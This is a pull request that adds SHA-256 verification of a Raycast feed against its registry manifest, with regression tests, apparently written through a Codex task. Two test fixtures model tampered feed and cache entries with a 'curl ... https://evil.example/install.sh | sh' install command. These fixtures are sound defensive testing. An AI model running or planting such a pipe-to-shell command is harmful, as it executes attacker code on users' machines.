### PR TITLE
fix(raycast): verify feed manifest hashes

### DIFF
--- a/integrations/raycast/src/feed.ts
+++ b/integrations/raycast/src/feed.ts
@@ -166,11 +166,13 @@ export type FeedSnapshotMetadata = {
   generatedAt: string;
   signature: string;
   detailCacheNamespace: string;
+  verifiedContentSha256?: string;
 };
 
 export type RegistryManifestSnapshot = {
   generatedAt: string;
   signature: string;
+  feedSha256?: string;
 };
 
 export type CategoryOption = {
@@ -755,14 +757,21 @@ export function filterDiscoveryEntries(
 export function buildFeedSnapshotMetadata(
   feed: Pick<ParsedFeed, "generatedAt">,
   manifestSnapshot?: RegistryManifestSnapshot | null,
+  contentSha256?: string,
 ): FeedSnapshotMetadata {
   const generatedAt = manifestSnapshot?.generatedAt || feed.generatedAt || "";
   const signature = manifestSnapshot?.signature || generatedAt;
+  const verifiedContentSha256 =
+    manifestSnapshot?.feedSha256 &&
+    contentSha256 === manifestSnapshot.feedSha256
+      ? contentSha256
+      : undefined;
 
   return {
     generatedAt,
     signature,
     detailCacheNamespace: signature || generatedAt || "unknown",
+    ...(verifiedContentSha256 ? { verifiedContentSha256 } : {}),
   };
 }
 
@@ -779,12 +788,14 @@ export function parseFeedSnapshotMetadata(
     const signature = optionalString(parsed.signature);
     const detailCacheNamespace =
       optionalString(parsed.detailCacheNamespace) || signature || generatedAt;
+    const verifiedContentSha256 = optionalString(parsed.verifiedContentSha256);
     if (!signature && !generatedAt) return null;
 
     return {
       generatedAt,
       signature,
       detailCacheNamespace: detailCacheNamespace || "unknown",
+      ...(verifiedContentSha256 ? { verifiedContentSha256 } : {}),
     };
   } catch {
     return null;
@@ -804,14 +815,15 @@ export function parseRegistryManifestSnapshot(
   const raycastContract = isRecord(contracts["raycast-index.json"])
     ? contracts["raycast-index.json"]
     : null;
-  const signature = raycastContract
+  const feedSha256 = raycastContract
     ? optionalString(raycastContract.sha256)
     : "";
 
-  if (!signature && !generatedAt) return null;
+  if (!feedSha256 && !generatedAt) return null;
   return {
     generatedAt,
-    signature: signature || generatedAt,
+    signature: feedSha256 || generatedAt,
+    ...(feedSha256 ? { feedSha256 } : {}),
   };
 }
 

--- a/integrations/raycast/src/runtime.ts
+++ b/integrations/raycast/src/runtime.ts
@@ -145,10 +145,41 @@ function isSameFeedSnapshot(
   cachedMetadata: FeedSnapshotMetadata | null,
   manifestSnapshot: RegistryManifestSnapshot,
 ) {
+  if (manifestSnapshot.feedSha256) {
+    return Boolean(
+      cachedMetadata?.signature === manifestSnapshot.signature &&
+      cachedMetadata.verifiedContentSha256 === manifestSnapshot.feedSha256,
+    );
+  }
+
   return Boolean(
     cachedMetadata?.signature &&
     cachedMetadata.signature === manifestSnapshot.signature,
   );
+}
+
+async function sha256Hex(value: string) {
+  const digest = await crypto.subtle.digest(
+    "SHA-256",
+    new TextEncoder().encode(value),
+  );
+  return Array.from(new Uint8Array(digest), (byte) =>
+    byte.toString(16).padStart(2, "0"),
+  ).join("");
+}
+
+async function verifyFeedPayloadSignature(
+  text: string,
+  manifestSnapshot: RegistryManifestSnapshot | null,
+) {
+  const expectedSha256 = manifestSnapshot?.feedSha256;
+  if (!expectedSha256) return undefined;
+
+  const actualSha256 = await sha256Hex(text);
+  if (actualSha256 !== expectedSha256) {
+    throw new Error("Feed payload SHA-256 did not match registry manifest");
+  }
+  return actualSha256;
 }
 
 function removeDetailCacheForSnapshot(options: {
@@ -317,12 +348,20 @@ export async function fetchFreshFeed(options: {
 
   try {
     const text = await fetchFeedPayload(fetchFn, feedUrl);
+    const contentSha256 = await verifyFeedPayloadSignature(
+      text,
+      manifestSnapshot,
+    );
     const nextFeed = parseFeed(text);
     if (nextFeed.entries.length === 0) {
       throw new Error("Feed contained no entries");
     }
 
-    const nextMetadata = buildFeedSnapshotMetadata(nextFeed, manifestSnapshot);
+    const nextMetadata = buildFeedSnapshotMetadata(
+      nextFeed,
+      manifestSnapshot,
+      contentSha256,
+    );
     options.cache.set(feedCacheKey(feedUrl), text);
     saveFeedSnapshotMetadata(options.cache, feedUrl, nextMetadata);
     invalidateDetailCacheWhenSnapshotChanges({

--- a/integrations/raycast/test/feed.test.ts
+++ b/integrations/raycast/test/feed.test.ts
@@ -1,4 +1,5 @@
 import assert from "node:assert/strict";
+import { createHash } from "node:crypto";
 import fs from "node:fs";
 import path from "node:path";
 import { describe, it } from "node:test";
@@ -182,6 +183,10 @@ function response(body: unknown, init: ResponseInit = {}) {
     headers: { "content-type": "application/json" },
     ...init,
   });
+}
+
+function sha256Hex(value: string) {
+  return createHash("sha256").update(value, "utf8").digest("hex");
 }
 
 async function captureConsoleWarnings<T>(callback: () => T | Promise<T>) {
@@ -875,10 +880,7 @@ describe("Raycast feed helpers", () => {
       registrySource,
       /Search is temporarily unavailable\. Try again shortly\./,
     );
-    assert.match(
-      registrySource,
-      /\?\s*SERVER_SEARCH_UNAVAILABLE_MESSAGE\s*:/,
-    );
+    assert.match(registrySource, /\?\s*SERVER_SEARCH_UNAVAILABLE_MESSAGE\s*:/);
     assert.doesNotMatch(registrySource, /\?\s*serverSearch\.error\s*:/);
   });
 
@@ -1050,6 +1052,15 @@ describe("Raycast feed helpers", () => {
       }),
     );
 
+    const safeFeedPayload = JSON.stringify({
+      generatedAt: "2026-04-28T00:00:00.000Z",
+      entries: [
+        {
+          ...sampleEntry,
+          installCommand: "claude mcp add context7 --safe",
+        },
+      ],
+    });
     const requestedUrls: string[] = [];
     const feed = await fetchFreshFeed({
       cache,
@@ -1063,20 +1074,12 @@ describe("Raycast feed helpers", () => {
               "raycast-index.json": {
                 path: "/data/raycast-index.json",
                 type: "json",
-                sha256: "fixed-feed-signature",
+                sha256: sha256Hex(safeFeedPayload),
               },
             },
           });
         }
-        return response({
-          generatedAt: "2026-04-28T00:00:00.000Z",
-          entries: [
-            {
-              ...sampleEntry,
-              installCommand: "claude mcp add context7 --safe",
-            },
-          ],
-        });
+        return response(safeFeedPayload);
       },
     });
 
@@ -1088,7 +1091,7 @@ describe("Raycast feed helpers", () => {
     assert.deepEqual(requestedUrls, [registryManifestUrl(devFeed), devFeed]);
     assert.equal(
       JSON.parse(cache.get(feedMetadataCacheKey(devFeed)) || "{}").signature,
-      "fixed-feed-signature",
+      sha256Hex(safeFeedPayload),
     );
   });
 
@@ -1134,18 +1137,19 @@ describe("Raycast feed helpers", () => {
     assert.equal(search.entries.length, 1);
     assert.equal(search.nextOffset, 20);
 
-    const { value: tolerantSearch, warnings } = await captureConsoleWarnings(() =>
-      fetchRegistrySearch({
-        query: "context",
-        fetchFn: async () =>
-          response({
-            total: 2,
-            limit: 20,
-            offset: 0,
-            nextOffset: null,
-            results: [sampleSearchResult(), { slug: "broken" }],
-          }),
-      }),
+    const { value: tolerantSearch, warnings } = await captureConsoleWarnings(
+      () =>
+        fetchRegistrySearch({
+          query: "context",
+          fetchFn: async () =>
+            response({
+              total: 2,
+              limit: 20,
+              offset: 0,
+              nextOffset: null,
+              results: [sampleSearchResult(), { slug: "broken" }],
+            }),
+        }),
     );
     assert.equal(tolerantSearch.entries.length, 1);
     assert.equal(tolerantSearch.skippedMalformedEntries, 1);
@@ -1160,6 +1164,119 @@ describe("Raycast feed helpers", () => {
     );
   });
 
+  it("rejects feed payloads whose SHA-256 does not match the manifest", async () => {
+    const cache = new MemoryCache();
+    const devFeed = "https://preview.example.com/data/raycast-index.json";
+    const legitimateFeedPayload = JSON.stringify({
+      generatedAt: "2026-04-28T00:00:00.000Z",
+      entries: [sampleEntry],
+    });
+    const tamperedFeedPayload = JSON.stringify({
+      generatedAt: "2026-04-28T00:00:00.000Z",
+      entries: [
+        {
+          ...sampleEntry,
+          installCommand: "curl -fsSL https://evil.example/install.sh | sh",
+        },
+      ],
+    });
+
+    await assert.rejects(
+      fetchFreshFeed({
+        cache,
+        feedUrl: devFeed,
+        fetchFn: async (input) => {
+          if (String(input).endsWith("/data/registry-manifest.json")) {
+            return response({
+              generatedAt: "2026-04-28T00:00:00.000Z",
+              artifactContracts: {
+                "raycast-index.json": {
+                  path: "/data/raycast-index.json",
+                  type: "json",
+                  sha256: sha256Hex(legitimateFeedPayload),
+                },
+              },
+            });
+          }
+          return response(tamperedFeedPayload);
+        },
+      }),
+      /Feed payload SHA-256 did not match registry manifest/,
+    );
+
+    assert.equal(cache.get(feedCacheKey(devFeed)), undefined);
+    assert.equal(cache.get(feedMetadataCacheKey(devFeed)), undefined);
+  });
+
+  it("refetches same-signature cached feeds without verified content hashes", async () => {
+    const cache = new MemoryCache();
+    const devFeed = "https://preview.example.com/data/raycast-index.json";
+    const legitimateFeedPayload = JSON.stringify({
+      generatedAt: "2026-04-28T00:00:00.000Z",
+      entries: [
+        {
+          ...sampleEntry,
+          installCommand: "claude mcp add context7 --safe",
+        },
+      ],
+    });
+    const legitimateFeedSha256 = sha256Hex(legitimateFeedPayload);
+    cache.set(
+      feedCacheKey(devFeed),
+      JSON.stringify({
+        generatedAt: "2026-04-28T00:00:00.000Z",
+        entries: [
+          {
+            ...sampleEntry,
+            installCommand: "curl -fsSL https://evil.example/install.sh | sh",
+          },
+        ],
+      }),
+    );
+    cache.set(
+      feedMetadataCacheKey(devFeed),
+      JSON.stringify({
+        generatedAt: "2026-04-28T00:00:00.000Z",
+        signature: legitimateFeedSha256,
+        detailCacheNamespace: legitimateFeedSha256,
+      }),
+    );
+
+    const requestedUrls: string[] = [];
+    const feed = await fetchFreshFeed({
+      cache,
+      feedUrl: devFeed,
+      fetchFn: async (input) => {
+        requestedUrls.push(String(input));
+        if (String(input).endsWith("/data/registry-manifest.json")) {
+          return response({
+            generatedAt: "2026-04-28T00:00:00.000Z",
+            artifactContracts: {
+              "raycast-index.json": {
+                path: "/data/raycast-index.json",
+                type: "json",
+                sha256: legitimateFeedSha256,
+              },
+            },
+          });
+        }
+        return response(legitimateFeedPayload);
+      },
+    });
+
+    assert.equal(feed.refreshStatus, "updated");
+    assert.equal(
+      feed.entries[0].installCommand,
+      "claude mcp add context7 --safe",
+    );
+    assert.deepEqual(requestedUrls, [registryManifestUrl(devFeed), devFeed]);
+    assert.equal(
+      JSON.parse(cache.get(feedMetadataCacheKey(devFeed)) || "{}")
+        .verifiedContentSha256,
+      legitimateFeedSha256,
+    );
+  });
+
   it("skips the full Raycast feed when the manifest signature is unchanged", async () => {
     const cache = new MemoryCache();
     const devFeed = "https://preview.example.com/data/raycast-index.json";
@@ -1168,7 +1285,9 @@ describe("Raycast feed helpers", () => {
       {
         generatedAt: "2026-04-28T00:00:00.000Z",
         signature: "same-signature",
+        feedSha256: "same-signature",
       },
+      "same-signature",
     );
     cache.set(
       feedCacheKey(devFeed),
@@ -1238,6 +1357,11 @@ describe("Raycast feed helpers", () => {
       }),
     );
 
+    const updatedFeedPayload = JSON.stringify({
+      generatedAt: "2026-04-29T00:00:00.000Z",
+      entries: [{ ...sampleEntry, title: "Context7 Updated" }],
+    });
+    const updatedFeedSha256 = sha256Hex(updatedFeedPayload);
     const requestedUrls: string[] = [];
     const feed = await fetchFreshFeed({
       cache,
@@ -1251,26 +1375,23 @@ describe("Raycast feed helpers", () => {
               "raycast-index.json": {
                 path: "/data/raycast-index.json",
                 type: "json",
-                sha256: "new-signature",
+                sha256: updatedFeedSha256,
               },
             },
           });
         }
-        return response({
-          generatedAt: "2026-04-29T00:00:00.000Z",
-          entries: [{ ...sampleEntry, title: "Context7 Updated" }],
-        });
+        return response(updatedFeedPayload);
       },
     });
 
     assert.equal(feed.refreshStatus, "updated");
-    assert.equal(feed.signature, "new-signature");
+    assert.equal(feed.signature, updatedFeedSha256);
     assert.equal(feed.entries[0].title, "Context7 Updated");
     assert.deepEqual(requestedUrls, [registryManifestUrl(devFeed), devFeed]);
     assert.equal(cache.get(oldDetailKey), undefined);
     assert.equal(
       JSON.parse(cache.get(feedMetadataCacheKey(devFeed)) || "{}").signature,
-      "new-signature",
+      updatedFeedSha256,
     );
   });
 


### PR DESCRIPTION
### Motivation
- The manifest-driven refresh path treated the manifest `artifactContracts["raycast-index.json"].sha256` as an opaque cache version and never verified the actual feed bytes, allowing a transiently tampered feed to be cached and trusted until the manifest changed. 
- The change ensures the registry manifest's claimed feed SHA-256 is enforced by computing and checking the downloaded feed payload hash before caching or marking the snapshot verified.

### Description
- Parse and expose the manifest's Raycast feed SHA-256 as `feedSha256` and carry an optional `verifiedContentSha256` in `FeedSnapshotMetadata` to record verified content hashes. 
- Verify the fetched feed payload SHA-256 (using the platform `crypto.subtle` helper) against `manifestSnapshot.feedSha256` before parsing, caching, or saving metadata, and throw if it does not match. 
- Only skip fetching the full feed when the manifest provides a `feedSha256` and the cached metadata includes a matching `verifiedContentSha256`; otherwise refetch and re-verify. 
- Add regression unit tests that reject tampered feed payloads, verify previously unverified same-signature cached feeds are re-fetched and verified, and ensure valid verified-feed flows still skip unnecessary downloads.

### Testing
- Ran TypeScript type-check with `pnpm --dir integrations/raycast exec tsc --noEmit` which succeeded. 
- Ran the Raycast unit tests with `pnpm --dir integrations/raycast test` and all tests passed (`37` tests, `0` failures). 
- Verified code style with `pnpm exec prettier --check integrations/raycast/src/feed.ts integrations/raycast/src/runtime.ts integrations/raycast/test/feed.test.ts` which passed. 
- `pnpm validate:raycast-feed` was attempted but is blocked in this checkout due to the missing `apps/web/public/data/raycast-index.json` file, so it was not completed.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a264d5a13f48320a8b643a6b1ffff7c)